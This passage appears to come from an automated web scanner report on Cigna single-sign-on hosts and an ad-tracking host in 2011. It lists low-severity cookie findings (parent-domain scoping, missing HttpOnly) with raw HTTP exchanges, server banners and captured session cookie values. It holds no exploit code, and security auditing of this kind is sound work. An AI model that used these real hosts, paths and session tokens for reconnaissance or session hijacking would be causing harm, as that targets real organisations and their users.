User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:30:26 GMT
Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq=ffffffffaf130e8145525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 15:47:24 GMT;path=/
Set-Cookie: rfaft2c1=3drGKRGPiL8l+bTjFqkS/7Avg5cA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regionsmortgage.com_%2F_wlf=TlNDX3RmZHZzZi5ucHN1aGJoZi13anFf?xSHrpgIYavehm1DAGTFWnGGtSQcA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Cache-Control: private
Set-Cookie: NSC_tfdvsf.sfhjpotnpsuhbhf.dpn=ffffffffaf130d0445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
7.9. https://sso.corp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=84D993307FD1107FC884A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:19 GMT
Content-length: 261
Content-type: text/html
Set-Cookie: TLTHID=8C93EE5E7FD1107FC96FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "f2e32241-1-0-105"
Last-modified: Sun, 17 Jul 2005 20:01:07 GMT
Accept-ranges: bytes

<HTML>
<HEAD>
<META Http-Equiv="Cache-Control" Content="no-cache">
<META Http-Equiv="Pragma" Content="no-cache">
<META Http-Equiv="Expires" Content="0">
<META HTTP-EQUIV="Refresh" Content="0
...[SNIP]...
7.10. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/CIGNAforpros_logo1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/CIGNAforpros_logo1.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; JSESSIONID=0001mmeItkCv4WhFhPcFW-cezLI:13agknsul; TLTHID=92964B127FD1107FCAD3A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:39 GMT
Content-length: 4668
Content-type: image/gif
Set-Cookie: TLTHID=989F512A7FD1107FCBACA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "62a2347d-1-0-123c"
Last-modified: Mon, 19 Jan 2004 19:08:58 GMT
Accept-ranges: bytes

GIF89a..:.......D...........y.................c..9.......................n.................r..Y...........................z..........H..xxx.........,........W........d.................z...........<...
...[SNIP]...
7.11. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/arrow_orange.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/arrow_orange.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "ef1cee75-1-0-3d"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA16587FD9107F089BA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

7.12. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/cigna_logo.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/cigna_logo.jpg HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "38eba70c-1-0-9ae"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA4F9C7FD9107F089FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

7.13. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_ID.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/header_forgot_ID.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "7e42fb94-3-0-48c"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7E0907FD9107F0896A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

7.14. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_password.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/header_forgot_password.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=74B632B07FD1107FC7D4A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:42 GMT
Content-length: 1858
Content-type: image/gif
Set-Cookie: TLTHID=76094A447FD1107FC7EAA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "50bef55a-8-0-742"
Last-modified: Sat, 10 Jan 2004 21:45:32 GMT
Accept-ranges: bytes

GIF89a..........k..7............q.............y...........Y..t..D..#y...............................................................................i.....D......n....c..........................Q......
...[SNIP]...
7.15. https://sso.corp.cigna.com/corp/sso/images/pshim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/pshim.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/pshim.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "4c740010-1-0-327"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7FF807FD9107F0898A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

7.16. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/truesecure.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/truesecure.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "8bbd1376-1-0-c0f"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA13387FD9107F089AA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

7.17. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/yahoo_logo.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/yahoo_logo.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "c45c439f-1-0-65"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA49AC7FD9107F089EA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

7.18. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/includes/portal_styles.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/includes/portal_styles.css HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "4ceaf758-1-0-a3d"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=4D8EA84A7FD9107F04F9A536181C0CE6; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:27:33 GMT
Set-Cookie: TLTHID=67A13BF87FD9107F05A8A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

7.19. https://sso.corp.cigna.com/corp/sso/professional/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:39 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Set-cookie: JSESSIONID=0001aplKypDyIh3-IsriGvhcHmv:13agknsul; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Password - Enter User Name</title>
<link rel="ST
...[SNIP]...
7.20. https://sso.corp.cigna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:46 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: TLTHID=78D4C8B67FD1107FC7FFA536181C0CE6; Path=/; Domain=.cigna.com

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...
7.21. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; dp_rec="{\"2\": 1305550329}"

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 17:09:13 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFzPHv3AuLo49+5gFdq589Y4FAG34CUA=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 17:09:13 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

8. Cookie without HttpOnly flag set  previous  next
There are 163 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

8.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotId.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotId.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:34 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000WJAfBu1bY2N8CqEkO0_cQjE:15eoj2vv7; Path=/
Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0

8.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotPassword.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
